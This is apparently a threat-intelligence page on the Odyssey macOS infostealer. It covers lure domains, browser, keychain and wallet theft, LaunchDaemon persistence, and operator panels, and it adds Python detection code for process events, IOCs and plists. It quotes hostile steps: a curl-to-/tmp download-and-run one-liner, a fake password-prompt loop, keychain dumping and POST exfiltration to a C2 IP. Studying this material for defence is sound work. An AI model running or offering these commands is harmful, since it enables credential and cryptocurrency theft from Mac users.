Odyssey

Odyssey is a macOS information stealer and malware-as-a-service (MaaS) offering. The reporting describes it as a rebrand and successor of Poseidon Stealer, which itself forked from Atomic macOS Stealer (AMOS). It is part of the broader AMOS/Poseidon/Odyssey macOS stealer family and is consistently associated with theft of browser cookies, saved credentials, authentication tokens, cryptocurrency wallet data, and other user information.

Observed delivery methods are heavily social-engineering driven. Odyssey has been distributed through weaponized DMG installers disguised as legitimate software, including fake branded installers that instruct users to bypass Gatekeeper protections. It has also been delivered through ClickFix-style phishing pages impersonating brands such as TradingView, Microsoft Teams, and Spectrum, where victims are tricked into copying and executing malicious commands in Terminal or via osascript. Reported hosting and lure domains tied to Odyssey campaigns include teamsonsoft[.]com, tradingview.connect-app[.]us[.]com, treadingveew.dekstop-apps[.]com, treadingveew.last-desk[.]org, claudflurer[.]com, emailreddit[.]com, cloudlare-lndex[.]com, and tradingviewen[.]com.

Functionally, Odyssey steals data from Safari, Chromium-based browsers, and Gecko-based browsers. Reported collected artifacts include Cookies.binarycookies, Form Values, Cookies, Web Data, Login Data, Local Extension Settings, IndexedDB data, cookies.sqlite, formhistory.sqlite, key4.db, and logins.json. It specifically targets MetaMask by locating and copying its IndexedDB storage. It also steals Apple Notes data, login keychains, and local passwords, including use of dscl . authonly to validate the local password and a fake prompt reading "Required Application Helper. Please enter device password to continue." to capture credentials. In one documented campaign it attempted to retrieve the Chrome keychain item and stored captured passwords in ~/.pwd.

Odyssey also targets cryptocurrency users extensively. Reporting states it recursively copies data from desktop wallets including Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, and Ledger Live, and also collects Binance and TonKeeper configuration paths. In the CloudSEK-tracked campaign, stolen data was mirrored into temporary directories, archived to /tmp/out.zip using ditto -c -k, and exfiltrated via HTTP POST to http://185.93.89[.]62/log with custom headers including username: vipx and repeat: false.

Persistence and follow-on behavior have also been documented. Odyssey established persistence by installing a randomly named com.<random>.plist LaunchDaemon under /Library/LaunchDaemons/ and invoking launchctl bootstrap system. The same campaign replaced /Applications/Ledger Live.app with a trojanized version downloaded from C2 infrastructure. Additional reported Odyssey C2 or related infrastructure includes 45.146.130[.]129 and 185.93.89[.]62.
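The delivery, credential-theft, staging and persistence steps described above all surface as process executions (osascript run script, curl into /tmp followed by chmod +x, dscl . authonly, the Chrome keychain read, ditto into /tmp/out.zip, launchctl bootstrap of a com.<random>.plist). The following Python is an added example, not code from the reporting or from Mallory: it scores EDR-style process events against those steps and alerts only when several distinct stages cluster on one host, so that a lone ditto or launchctl by an administrator does not fire. The event fields (ts, host, parent, cmd), the rule names and thresholds are assumptions of the example, and the sample events are constructed, not captured telemetry.

```python
"""Behavioural triage of macOS process events for the Odyssey stealer chain.
Example code; the event shape and rules are assumptions, and SAMPLE_EVENTS
is constructed (no real hosts, users or infrastructure)."""
import re
from collections import defaultdict

# (rule id, ATT&CK id, regex over the command line, parents that make the
# command suspicious; None = flag whatever the parent is).
RULES = [
    ("osascript_run_script", "T1059.002",
     re.compile(r"\bosascript\s+-e\s+'run script"), None),
    ("curl_to_tmp", "T1059.004",
     re.compile(r"\bcurl\b.*\s-o\s+/tmp/\S+"), {"Terminal", "sh", "bash", "zsh"}),
    ("chmod_exec_tmp", "T1059.004",
     re.compile(r"\bchmod\s+\+x\s+/tmp/\S+"), {"Terminal", "sh", "bash", "zsh"}),
    ("dscl_authonly_probe", "T1056.002",
     re.compile(r"\bdscl\s+\.\s+authonly\b"), {"osascript", "sh", "bash", "zsh"}),
    ("chrome_keychain_dump", "T1555.001",
     re.compile(r"\bsecurity\b.*find-generic-password\s+-ga\s+\"?Chrome"), None),
    ("profiler_inventory", "T1082",
     re.compile(r"\bsystem_profiler\s+SPSoftwareDataType\s+SPHardwareDataType"),
     {"osascript", "sh", "bash", "zsh"}),
    ("ditto_zip_tmp_out", "T1560",
     re.compile(r"\bditto\s+-c\s+-k\b.*\s/tmp/out\.zip\b"), None),
    ("launchdaemon_bootstrap", "T1543.004",
     re.compile(r"\blaunchctl\s+bootstrap\s+system\s+/Library/LaunchDaemons/com\.\w+\.plist"), None),
]


def match_event(event):
    """Return (rule id, technique) for the first rule the event satisfies, else None."""
    for rule_id, technique, pattern, parents in RULES:
        if pattern.search(event["cmd"]) and (parents is None or event["parent"] in parents):
            return rule_id, technique
    return None


def triage(events, window=900, min_stages=3):
    """Cluster rule hits per host inside `window` seconds and alert when at
    least `min_stages` distinct rules fire: a single hit is routine admin
    activity, the chain is not. One alert per host is enough for triage."""
    hits_by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        matched = match_event(ev)
        if matched:
            rule_id, technique = matched
            hits_by_host[ev["host"]].append((ev["ts"], rule_id, technique, ev["cmd"]))
    alerts = []
    for host, hits in hits_by_host.items():
        for t0, _rule, _tech, _cmd in hits:
            cluster = [h for h in hits if t0 <= h[0] <= t0 + window]
            stages = sorted({h[1] for h in cluster})
            if len(stages) >= min_stages:
                alerts.append({"host": host, "first_seen": t0, "stages": stages,
                               "techniques": sorted({h[2] for h in cluster}),
                               "commands": [h[3] for h in cluster]})
                break
    return alerts


# Constructed events: mac-01 plays out the documented chain, mac-02 is an
# administrator zipping a folder, which must not alert on its own.
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "mac-01", "parent": "Terminal",
     "cmd": "curl -o /tmp/update https://lure.example/getrur/update"},
    {"ts": 1003, "host": "mac-01", "parent": "Terminal", "cmd": "chmod +x /tmp/update"},
    {"ts": 1010, "host": "mac-01", "parent": "sh",
     "cmd": "osascript -e 'run script \"set x to 1\"'"},
    {"ts": 1015, "host": "mac-01", "parent": "osascript", "cmd": "dscl . authonly jdoe ********"},
    {"ts": 1020, "host": "mac-01", "parent": "osascript",
     "cmd": "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"},
    {"ts": 1030, "host": "mac-01", "parent": "osascript",
     "cmd": "security find-generic-password -ga \"Chrome\""},
    {"ts": 1040, "host": "mac-01", "parent": "osascript",
     "cmd": "ditto -c -k --sequesterRsrc /tmp/Abc123 /tmp/out.zip"},
    {"ts": 1050, "host": "mac-01", "parent": "sh",
     "cmd": "launchctl bootstrap system /Library/LaunchDaemons/com.kxq7t2.plist"},
    {"ts": 2000, "host": "mac-02", "parent": "Terminal",
     "cmd": "ditto -c -k /Users/admin/Documents/report /tmp/out.zip"},
    {"ts": 2100, "host": "mac-02", "parent": "launchd", "cmd": "/usr/bin/security find-certificate -a"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["techniques"])
```

The window and stage threshold are the tuning knobs: the documented chain runs within minutes of the victim pasting the command, so a short window with three or more distinct stages separates it from day-to-day use of ditto, security or launchctl.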

Research into Odyssey operator infrastructure identified live administration panels on 86.54.25[.]202 and 86.54.25[.]204 hosted on a Kazakhstan subnet associated with AS210006 (GOODTEC). One panel was itself backdoored by another threat actor via injected JavaScript that intercepted POST requests to /api/v1/sign-in and exfiltrated operator cookies and credentials to scan-tron[.]link on 107.189.23[.]185. Analysis of a clean panel exposed 29 Odyssey API routes and showed functionality for bot management, AppleScript payload building, stolen log management, SOCKS proxy management, Telegram and FTP exfiltration settings, guest access, admin controls, seed phrase handling, and an /api/v1/admin/safe-exit emergency teardown capability. The panel code also referenced vash-server[.]com as a default server configuration placeholder.

High-confidence indicators mentioned in the reporting include: 185.93.89[.]62, 45.146.130[.]129, 86.54.25[.]202, 86.54.25[.]204, scan-tron[.]link, vash-server[.]com, teamsonsoft[.]com, and the SHA-256 hashes 95c17869073bff8a045083315c97583cb0d4f4c19165e657ed584ef7e16868a1 (backdoored Odyssey panel bundle) and 6c0c64c2da550ecab6eb9b855afe2833fde8f928a37168b7e4527665a9a7ae47 (clean Odyssey panel bundle).
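The indicators on this page are defanged ([.] and [:] brackets, hxxps) and mixed in type, so they need normalising before they can be matched against telemetry. The following Python is an added example, not part of the reporting or of Mallory: it refangs the page's indicators, classifies each as IP, domain, URL host or SHA-256, and matches them against DNS, proxy and file-event log lines, treating a subdomain of a listed domain as a hit. The log line format is an assumption of the example and the log lines are constructed; the indicator values themselves are the ones printed on this page.

```python
"""Refang, classify and match the page's defanged IOCs against log lines.
Example code; SAMPLE_LOGS is constructed and the log format is assumed."""
import ipaddress
import re

# Indicators as printed on the page (defanged, except the first).
PAGE_IOCS = [
    "185.93.89.62", "45.146.130[.]129", "86.54.25[.]202", "86.54.25[.]204",
    "scan-tron[.]link", "vash-server[.]com", "teamsonsoft[.]com",
    "tradingview.connect-app[.]us[.]com",
    "hxxps[:]//applemacios[.]com/getrur/update",
    "95c17869073bff8a045083315c97583cb0d4f4c19165e657ed584ef7e16868a1",
]


def refang(value):
    """Undo common defanging: [.] -> ., [:] -> :, hxxp(s):// -> http(s)://."""
    v = value.strip().replace("[.]", ".").replace("[:]", ":")
    v = re.sub(r"^hxxp(s?)://", r"http\1://", v, flags=re.IGNORECASE)
    return v.lower()


def classify(value):
    """Return (kind, key): key is the part that is compared with telemetry
    (a URL contributes its host, since proxies log the full URL anyway)."""
    v = refang(value)
    if re.fullmatch(r"[0-9a-f]{64}", v):
        return "sha256", v
    if "://" in v:
        return "url", re.match(r"https?://([^/:]+)", v).group(1)
    try:
        ipaddress.ip_address(v)
        return "ip", v
    except ValueError:
        return "domain", v


def build_index(values):
    index = {"ip": set(), "domain": set(), "sha256": set()}
    for val in values:
        kind, key = classify(val)
        index["domain" if kind == "url" else kind].add(key)
    return index


HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)


def domain_hit(name, domains):
    """Exact match, or a subdomain of a listed domain (cdn.<listed> counts)."""
    name = name.lower()
    return any(name == d or name.endswith("." + d) for d in domains)


def match_line(line, index):
    hits = []
    for name in HOST_RE.findall(line):
        if domain_hit(name, index["domain"]):
            hits.append(("domain", name.lower()))
    for ip in IP_RE.findall(line):
        if ip in index["ip"]:
            hits.append(("ip", ip))
    for h in HASH_RE.findall(line):
        if h.lower() in index["sha256"]:
            hits.append(("sha256", h.lower()))
    return hits


def scan(lines, values=PAGE_IOCS):
    """Return (line number, line, hit) for every indicator seen in `lines`."""
    index = build_index(values)
    return [(n, line, h) for n, line in enumerate(lines, 1) for h in match_line(line, index)]


# Constructed log lines; line 3 is legitimate TradingView traffic and must not match.
SAMPLE_LOGS = [
    "2025-11-02T10:14:03Z dns client=10.0.0.5 query=teamsonsoft.com type=A",
    "2025-11-02T10:14:09Z proxy client=10.0.0.5 method=POST url=http://185.93.89.62/log status=200",
    "2025-11-02T10:15:30Z dns client=10.0.0.9 query=www.tradingview.com type=A",
    "2025-11-02T10:16:01Z dns client=10.0.0.7 query=cdn.teamsonsoft.com type=AAAA",
    "2025-11-02T10:20:44Z edr host=mac-01 file=/tmp/panel.zip "
    "sha256=95c17869073bff8a045083315c97583cb0d4f4c19165e657ed584ef7e16868a1",
]

if __name__ == "__main__":
    for n, _line, hit in scan(SAMPLE_LOGS):
        print(n, hit)
```

The subdomain rule is deliberate: lure hosts in this family sit under registrable domains such as connect-app[.]us[.]com, so an exact-match-only list misses the next hostname the operator adds under the same domain.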

MITRE ATT&CK

Techniques & procedures

31 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (3 techniques)

T1078 Valid Accounts (evidence: 1)

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1195.002 Compromise Software Supply Chain (evidence: 1)

From the report's MITRE ATT&CK mapping for the backdoor (scan-tron[.]link targeting Odyssey operators): tactic Initial Access, technique Supply Chain Compromise, ID T1195.002.

T1566 Phishing (evidence: 1)

These attacks rely on fake software installers disguised as legitimate apps, tricking users into handing over access without raising any alarm.

Execution (4 techniques)

T1053.003 Cron (evidence: 1)

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1059.002 AppleScript (evidence: 2)

One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002)

T1059.004 Unix Shell (evidence: 1)

The command that’s copied for macOS devices instructs the system to... curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update ... chmod +x /tmp/update ... Run the downloaded file /tmp/update.

T1204 User Execution (evidence: 1)

A malicious one looks identical but includes instructions on how to override Gatekeeper, Apple’s tool for verifying trusted software.

Persistence (5 techniques)

T1053.003 Cron (evidence: 1)

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1078 Valid Accounts (evidence: 1)

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1543.004 Launch Daemon (evidence: 1)

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1547 Boot or Logon Autostart Execution (evidence: 1)

Per-bot actions: make persistent (survives reboot), execute remote shell commands, enable SOCKS proxy, re-run stealer.

T1556 Modify Authentication Process (evidence: 1)

From the report's MITRE ATT&CK mapping for the backdoor (scan-tron[.]link targeting Odyssey operators): ... tactic Defense Evasion, technique Modify Authentication Process, ID T1556.

Privilege Escalation (4 techniques)

T1053.003 Cron (evidence: 1)

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1078 Valid Accounts (evidence: 1)

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1543.004 Launch Daemon (evidence: 1)

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1547 Boot or Logon Autostart Execution (evidence: 1)

Per-bot actions: make persistent (survives reboot), execute remote shell commands, enable SOCKS proxy, re-run stealer.

Stealth (3 techniques)

T1036 Masquerading (evidence: 2)

Attackers invest heavily in making fake installers look exactly like the real thing, complete with branded graphics and instructions guiding victims to bypass Apple’s built-in protections.

T1070.004 File Deletion (evidence: 1)

Cleans up the working dir and /tmp/out.zip after upload. (T1070.004)

T1078 Valid Accounts (evidence: 1)

Stashes the captured password at ~/.pwd. (T1555, T1078)

Defense Impairment (1 technique)

T1556 Modify Authentication Process (evidence: 1)

From the report's MITRE ATT&CK mapping for the backdoor (scan-tron[.]link targeting Odyssey operators): ... tactic Defense Evasion, technique Modify Authentication Process, ID T1556.

Credential Access (9 techniques)

T1056.002 GUI Input Capture (evidence: 1)

Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110)

T1056.003 Web Portal Capture (evidence: 1)

When the wrapper sees a POST request to /api/v1/sign-in, it extracts username and password from the request body. Sends both to https://scan-tron[.]link/l?d=

T1110 Brute Force (evidence: 1)

Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110)

T1539 Steal Web Session Cookie (evidence: 3)

Credentials, browser cookies, authentication tokens, and crypto wallets are all fair game.

T1555 Credentials from Password Stores (evidence: 2)

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1555.001 Keychain (evidence: 1)

Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001)

T1555.003 Credentials from Web Browsers (evidence: 1)

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.): walks every Default/Profile * profile and copies Cookies, Web Data, Login Data (saved logins and autofill). (T1555.003)

T1556 Modify Authentication Process (evidence: 1)

From the report's MITRE ATT&CK mapping for the backdoor (scan-tron[.]link targeting Odyssey operators): ... tactic Defense Evasion, technique Modify Authentication Process, ID T1556.

T1649 Steal or Forge Authentication Certificates (evidence: 1)

Credentials, browser cookies, authentication tokens, and crypto wallets are all fair game.

Discovery (2 techniques)

T1082 System Information Discovery (evidence: 1)

Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082)

T1614 System Location Discovery (evidence: 1)

    if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian; then
        IS_CIS="true"
    fi
    ...
    if [ "$IS_CIS" = "true" ]; then
        send_debug_event "cis_blocked"
        ...
        exit 0
    fi

Collection (7 techniques)

T1005 Data from Local System (evidence: 2)

Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005)

T1056.002 GUI Input Capture (evidence: 1)

Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110)

T1056.003 Web Portal Capture (evidence: 1)

When the wrapper sees a POST request to /api/v1/sign-in, it extracts username and password from the request body. Sends both to https://scan-tron[.]link/l?d=

T1074 Data Staged (evidence: 1)

Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)

T1113 Screen Capture (evidence: 1)

Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113)

T1119 Automated Collection (evidence: 1)

Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113)

T1560 Archive Collected Data (evidence: 1)

Archives everything to /tmp/out.zip via ditto -c -k. (T1560)

Command and Control (2 techniques)

T1090.001 Internal Proxy (evidence: 1)

SOCKS proxy: turn infected Macs into SOCKS proxies filtered by country code. Proxy URL generation for direct use.

T1105 Ingress Tool Transfer (evidence: 1)

Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105)

Exfiltration (2 techniques)

T1041 Exfiltration Over C2 Channel (evidence: 3)

Instead, they run a smash-and-grab, pulling sensitive data and sending it off to a remote server before the victim notices.

T1567 Exfiltration Over Web Service (evidence: 1)

Sends everything to https://scan-tron[.]link/c?d= as a URL-encoded JSON blob via an invisible Image() beacon ... Sends both to https://scan-tron[.]link/l?d= via the same Image beacon technique.
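The LaunchDaemon evidence under Persistence and Privilege Escalation (a random-named com.<random>.plist under /Library/LaunchDaemons/, a shell wrapper around a downloaded command string, nohup as the fallback) can be triaged from the plist content itself, independently of process telemetry. The following Python is an added example, not code from the reporting or from Mallory: it parses LaunchDaemon plists with the standard library and scores each against those traits. The scoring, the label-randomness heuristic and the two plists are constructed for illustration; they are not a documented Odyssey signature.

```python
"""Score LaunchDaemon plists against the persistence traits described on the
page. Example code; the heuristics are assumptions and both plists below are
CONSTRUCTED, not recovered samples."""
import plistlib
import re

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
# Tokens that belong in a downloaded-command wrapper, not in a vendor daemon.
STAGING_RE = re.compile(r"\b(curl|nohup|osascript)\b|/tmp/")


def looks_random(component):
    """Heuristic for the <random> part of com.<random>: letters mixed with
    digits, or no vowels at all, is typical of generated labels and rare in
    vendor names (com.apple, com.docker, ...)."""
    has_digit = any(c.isdigit() for c in component)
    has_alpha = any(c.isalpha() for c in component)
    no_vowels = re.search(r"[aeiou]", component.lower()) is None
    return (has_digit and has_alpha) or (no_vowels and len(component) >= 5)


def triage_plist(data):
    """Parse one plist (bytes) and return its label, per-signal booleans,
    the summed score and a verdict (3 of 4 signals = suspicious)."""
    plist = plistlib.loads(data)
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    signals = {}
    m = re.fullmatch(r"com\.([A-Za-z0-9]+)", label)
    signals["random_label"] = bool(m) and looks_random(m.group(1))
    signals["shell_wrapper"] = len(args) >= 3 and args[0] in SHELLS and args[1] == "-c"
    body = args[2] if signals["shell_wrapper"] else " ".join(args)
    signals["staging_in_command"] = STAGING_RE.search(body) is not None
    signals["run_at_load"] = bool(plist.get("RunAtLoad", False))
    score = sum(signals.values())
    return {"label": label, "signals": signals, "score": score,
            "verdict": "suspicious" if score >= 3 else "benign-looking"}


def triage_directory(plists):
    """plists: {filename: bytes}. Returns results sorted by score, highest first."""
    results = [dict(triage_plist(data), file=name) for name, data in plists.items()]
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed: shaped like the documented wrapper (random label, sh -c, nohup of a /tmp binary).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.kxq7t2</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>nohup /tmp/update >/dev/null 2>&amp;1 &amp;</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed: an ordinary vendor updater daemon.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Library/Application Support/Example/updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

if __name__ == "__main__":
    for r in triage_directory({"com.kxq7t2.plist": SUSPICIOUS_PLIST,
                               "com.example.updater.plist": BENIGN_PLIST}):
        print(r["file"], r["score"], r["verdict"])
```

RunAtLoad alone is worth nothing (every real daemon sets it), which is why the verdict needs three signals; the shell wrapper plus a staging token is the pair that separates the documented loader from a vendor binary launched directly.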

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network (4 tracked)

IPs, domains, and DNS infrastructure linked to this family.

Other (4 tracked)

Other indicator types observed in public reporting.

Type     Value                                     Latest sighting
domain   (redacted on the public page)             1 month ago
domain   (redacted on the public page)             1 month ago
ip.v4    (redacted on the public page)             1 month ago
uri      (redacted on the public page)             1 month ago
domain   (redacted on the public page)             1 month ago
uri      (redacted on the public page)             4 months ago
ACTIVITY FEED

Recent activity

13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (8)

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (31)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.